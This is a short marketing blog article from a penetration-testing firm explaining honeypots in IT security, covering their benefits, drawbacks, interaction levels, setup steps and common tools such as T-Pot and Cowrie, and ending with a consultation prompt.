Penetration TestJan Kahmen7 min read

Honeypots in IT Security

The so-called honeypot is one of the most exciting concepts in the field of IT security. The honeypot is designed to specifically attract attackers - and thereby protect the sensitive data in the corporate network.

honeypots-it-en.png

Table of content

The so-called honeypot is one of the most exciting concepts in the field of IT security. The "honey trap" is designed to specifically attract attackers - and thereby protects the sensitive data in the corporate network.

The Honey Trap: What is a Honeypot?

The honeypot is a popular method of luring (potential) attackers away from their target, so to speak. But what exactly is such a honeypot?
In a way, it is a kind of "dummy target". With the help of the honeypot, hackers and other attackers think that they have already reached their target. In this way, potential cyberattacks can often be averted, which in turn increases IT security.
Important: Unlike classic security platforms or intrusion detection systems, the aim here is not just to ward off cyber attacks. Rather, the attackers should "fall into the honey trap" here, so it is possible to gain information about their actions. IT experts can then analyze the hackers' strategy.
This knowledge in turn forms the basis for a successful vulnerability assessment. In order to succeed in this endeavor, companies must isolate their honeypot server in a targeted manner.

Explanation of Terms

The term honeypot refers to a dummy target that distracts attackers from their real goal. However, the term does not originate in IT security: it is based on the consideration that bears are more likely to fall into a set trap if you set a honeypot in it.

Benefits and Advantages of Honeypots

The honeypot is an important measure in the field of IT security. With the help of the honeypot, it is possible to better understand the behavior of the attackers. Thus, the honeypot is an alternative to other conventional security strategies. It offers the following advantages:

  • Attack detection: due to its specific configuration, a honeypot server is not randomly accessible via the Internet. Therefore, any activity on the server can definitely be counted as an attack attempt.
  • Resources: since these systems are not production systems, the need for resources is low.
  • Information: With a honeypot, experts collect information about attack attempts. The knowledge gained can be used, for example, to plan and develop strategies during vulnerability scanning. But DDoS attacks can also be averted more easily by using honeypots.

In False Security: The Disadvantages of Honeypots

However, the honeypot in IT poses three major dangers:

  • The use of honeypots often leads companies to neglect their actual security devices. They lull themselves into a false sense of security and, for example, dispense with continuous vulnerability scanning. Key figures such as Mean Time to Detect (MTTD) are also often disregarded.
  • It is possible for sophisticated hackers to penetrate the productive system anyway. An excellent Security Incident Response helps to get such a problem under control quickly.
  • If the honeypot is not deceptively genuine, hackers could pass fake information to network administrators.

Different Types of "Honey Traps"

Honeypots react in a similar way to productive systems. This ensures that the attacker does not recognize the honey trap as such. An important criterion for this is, for example, the degree of interactivity.

High- vs. Low-interaction Honeypots

The high-interaction honeypot is not a simple simulation. Rather, it is a real system with real functionalities. This makes it more complex to operate and requires sufficient monitoring. Otherwise, the hacker may succeed in hijacking this honey trap and then use the server for further attacks.
Low-interaction honeypots are different. They simulate individual functions or services, but are not a real system. Accordingly, the use of these honeypots is much simpler and less complex.

Different Threat Types

The OWASP Mobile Top 10 contains a variety of potential vulnerabilities that pose a threat to the corporate network. Ideally, the honeypot redirects the attacks to the non-production system. The use of honeypots has proven effective in the following cases:

  • Database mockups help detect SQL injections or fake log-ins.
  • Email traps detect spam and thereby protect regular inboxes.
  • Spider honeypots are only accessible to web crawlers and help block them.
  • Malware honeypots mimic software and APIs to analyze malware attacks.
    Honeylinks can only be detected via HTML code analysis and initiate comprehensive protection measures as soon as the link is called.
  • Tarpits reduce the propagation speed of worms and hinder port scans.

Implement Honeypots Successfully - In 4 Steps

A honeypot for IT security can be set up quickly, but it requires good planning. A total of four steps are necessary before you can distract the attacker from his real target.

Step 1: Select a Server

Setting up a honeypot requires a server. However, since the honey trap requires few resources, low-powered hardware is perfectly sufficient. However, with physical honey traps, it is important that they remain isolated from the rest of the network.

Step 2: Install Honeypot Software

As with pentests, the use of honeypots requires sufficient planning and a sound concept. Detailed documentation, as is common in security assessments, is also useful when using honeypots.

Step 3: Configuration

For the successful use of a honeypot, a well thought-out configuration is necessary. The easiest way to do this is with the help of a security expert - such as Turingpoint. Finally, the honeypot should not be too easy to access. Otherwise, attackers could become suspicious.

Step 4: Testing

To test the honeypot, companies slip into the role of the hacker themselves. An alternative may be bug bounty hunting or a contracted ethical hacker. After a minimum amount of activity in the honeypot, it is essential to monitor and analyze the server logs.

Honeypot Software: 3 Options at a Glance

There are different types of honeypot software that can be used in everyday business, as the following examples show. Among the most popular variants are:

  • T-Pot: The all-in-one multi-honeypot platform is a multi-hierarchical platform with excellent visualization of the numerous honeypots.
  • Honeytrap: This extensible open source system helps organizations run, monitor and manage honeypots. It offers extensive configuration options and provides numerous agents.
  • Cowrie: This is a Telnet and SSH honeypot that aims to log brute force attacks. As a result, it allows dedicated observation of attacker behavior.

Contact

Curious? Convinced? Interested?

Schedule a no-obligation initial consultation with one of our sales representatives. Use the following link to select an appointment:

Arrange appointment